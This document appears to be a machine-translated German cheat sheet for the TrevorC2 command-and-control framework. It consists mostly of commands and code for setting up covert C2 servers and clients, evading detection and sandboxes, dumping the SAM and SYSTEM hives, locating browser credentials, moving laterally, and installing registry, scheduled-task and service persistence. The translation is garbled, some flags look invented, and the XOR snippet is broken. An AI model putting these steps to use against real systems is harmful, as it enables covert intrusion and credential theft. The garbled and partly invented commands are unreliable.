TrevorC2 Framework Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

TrevorC2 ist eine legitime Website, die Client/Server-Kommunikation für verdeckte Befehlsausführung Tunnel. Entwickelt von TrustedSec, verwendet es legitime Websites als Front für Befehls- und Steuerungskommunikation, so dass Erkennung extrem schwierig, da der Verkehr scheint normal Web-Browsing.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Gierinstallation

```bash

Clone the repository

git clone https://github.com/trustedsec/trevorc2.git cd trevorc2

Install Python dependencies

pip3 install -r requirements.txt ```_

Manuell Setup

```bash

Download latest release

wget https://github.com/trustedsec/trevorc2/archive/master.zip unzip master.zip cd trevorc2-master

Install dependencies

pip3 install pycrypto requests ```_

Docker Installation

```bash

Build Docker container

git clone https://github.com/trustedsec/trevorc2.git cd trevorc2 docker build -t trevorc2 .

Run container

docker run -it -p 443:443 trevorc2 ```_

Basisnutzung

Server Setup

```bash

Start TrevorC2 server

python3 trevorc2_server.py

Start server with custom configuration

python3 trevorc2_server.py --config custom_config.py

Start server on specific port

python3 trevorc2_server.py --port 8080 ```_

Kundenbetreuung

```bash

Generate client

python3 trevorc2_client.py

Generate client with custom server

python3 trevorc2_client.py --server https://example.com

Generate PowerShell client

python3 trevorc2_client.py --powershell ```_

Befehlsnummer

Serverbefehle

Command	Description
help	Display help menu
list	List active agents
interact <id>	Interact with agent
kill <id>	Kill specific agent
killall	Kill all agents
exit	Exit server

Agent Interaction

Command	Description
shell <command>	Execute shell command
upload <local> <remote>	Upload file to agent
download <remote> <local>	Download file from agent
screenshot	Take screenshot
keylogger start	Start keylogger
keylogger stop	Stop keylogger
keylogger dump	Dump keylogger data
persistence	Install persistence
migrate <pid>	Migrate to process
back	Background agent

Konfiguration

Serverkonfiguration

```python

config.py

BIND_PORT = 443 HOSTNAME = "0.0.0.0" WEBSITE_FOLDER = "site/" CERT_FILE = "server.pem"

Encryption settings

CIPHER_TYPE = "AES" HASH_TYPE = "SHA256"

Communication settings

BEACON_INTERVAL = 10 JITTER = 0.2

Logging

LOG_FILE = "trevorc2.log" DEBUG = False ```_

Client Konfiguration

```python

Client settings

SERVER_URL = "https://example.com" USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" SLEEP_TIME = 10 JITTER = 0.2

Persistence settings

PERSISTENCE_METHOD = "registry" PERSISTENCE_KEY = "Software\Microsoft\Windows\CurrentVersion\Run" ```_

Erweiterte Funktionen

Website Masquerading

```bash

Set up legitimate website front

mkdir site cp -r /var/www/html/* site/

Use custom website

python3 trevorc2_server.py --site /path/to/website

Clone existing website

wget -r -p -k https://example.com python3 trevorc2_server.py --site example.com/ ```_

SSL/TLS Konfiguration

```bash

Generate self-signed certificate

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

Use custom certificate

python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem

Let's Encrypt certificate

certbot certonly --standalone -d yourdomain.com python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pem ```_

Domain Fronting

```python

Configure domain fronting

FRONT_DOMAIN = "cdn.example.com" HOST_HEADER = "legitimate-site.com"

Client configuration for domain fronting

client_config = \\{ 'server_url': 'https://cdn.example.com', 'host_header': 'legitimate-site.com', 'sni': 'cdn.example.com' \\} ```_

Client Generation

Windows Client

```bash

Generate Windows executable

python3 trevorc2_client.py --windows --output client.exe

Generate PowerShell client

python3 trevorc2_client.py --powershell --output client.ps1

Generate batch file client

python3 trevorc2_client.py --batch --output client.bat ```_

Linux Client

```bash

Generate Linux binary

python3 trevorc2_client.py --linux --output client

Generate Python client

python3 trevorc2_client.py --python --output client.py

Generate shell script client

python3 trevorc2_client.py --shell --output client.sh ```_

macOS Client

```bash

Generate macOS binary

python3 trevorc2_client.py --macos --output client

Generate AppleScript client

python3 trevorc2_client.py --applescript --output client.scpt ```_

Evasion Techniken

Verkehrsobfukation

```python

Custom User-Agent strings

USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36" ]

Random beacon intervals

import random SLEEP_TIME = random.randint(5, 15) ```_

Belastbarkeitscodierung

```bash

Base64 encode payload

echo "payload"|base64

XOR encode payload

python3 -c " import sys key = 0xAA payload = sys.argv[1] encoded = ''.join([chr(ord© ^ key) for c in payload]) print(encoded.encode('hex')) " "your_payload" ```_

Antianalyse

```python

VM detection

import subprocess def check_vm(): vm_indicators = ['VMware', 'VirtualBox', 'QEMU'] try: output = subprocess.check_output('systeminfo', shell=True) for indicator in vm_indicators: if indicator in output.decode(): return True except: pass return False

Sandbox evasion

import time def sandbox_evasion(): time.sleep(60) # Sleep to avoid sandbox analysis # Check for mouse movement, user activity, etc. ```_

Post-Exploitation

Informationen sammeln

```bash

System information

shell systeminfo shell whoami /all shell net user shell net group

Network information

shell ipconfig /all shell netstat -an shell arp -a shell route print ```_

Credential Harvesting

```bash

Dump SAM database

shell reg save HKLM\SAM sam.hiv shell reg save HKLM\SYSTEM system.hiv download sam.hiv download system.hiv

Browser credentials

shell dir "%APPDATA%\Mozilla\Firefox\Profiles" shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"

Saved passwords

shell cmdkey /list ```_

Spätere Bewegung

```bash

Network discovery

shell net view shell ping -n 1 192.168.1.1-254

Share enumeration

shell net view \target-computer shell dir \target-computer\c$

Service enumeration

shell sc query shell tasklist /svc ```_

Persistenzmechanismen

```bash

Registry persistence

shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"

Scheduled task

shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon

Service persistence

shell sc create "UpdateService" binpath= "C:\temp\client.exe" shell sc config "UpdateService" start= auto ```_

Operationelle Sicherheit

Kommunikationssicherheit

```python

Encrypted communications

from Crypto.Cipher import AES from Crypto.Random import get_random_bytes

def encrypt_data(data, key): cipher = AES.new(key, AES.MODE_GCM) ciphertext, tag = cipher.encrypt_and_digest(data.encode()) return cipher.nonce + tag + ciphertext

Certificate pinning

import ssl def verify_certificate(hostname, cert_path): context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(cert_path) ```_

Operationelle Verfahren

```bash

Rotate infrastructure regularly

Use different domains and IPs

Implement proper logging and monitoring

Use legitimate certificates

Vary communication patterns

```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check server status

netstat -tlnp|grep :443

Test connectivity

curl -k https://your-server.com

Check firewall rules

iptables -L ufw status ```_

Client-Ausgaben

```bash

Debug client connection

Add debug prints to client code

print("Connecting to server...") print(f"Response: \\{response.status_code\\}")

Check DNS resolution

nslookup your-server.com dig your-server.com ```_

Zertifikat Probleme

```bash

Verify certificate

openssl x509 -in server.pem -text -noout

Test SSL connection

openssl s_client -connect your-server.com:443

Check certificate chain

curl -vI https://your-server.com ```_

Detektive Evasion

Netzwerkebene

• Verwenden Sie legitime Domains und Zertifikate
• Implement Domain fronting
• Vary Kommunikationsintervalle
• Verwenden Sie gemeinsame Ports (80, 443)
• Falsche legitime Verkehrsmuster

Host Level

• Vermeiden Sie gemeinsame IOCs
• legitime Prozessnamen verwenden
• Implementierung von Anti-VM-Techniken
• Dateilose Ausführung
• Verschlüsseln von Nutzlasten und Kommunikation

Verhalten

• Ressourcennutzung
• Verdächtige Aktivitäten vermeiden
• Verwenden Sie legitime Benutzer
• Implementierung der richtigen Fehlerbehandlung
• Artefakte reinigen

Ressourcen

• TrevorC2 GitHub Repository
• TrustedSec Blog
• TrevorC2 Dokumentation
• [Red Team Infrastructure](LINK_4_

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von TrevorC2. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *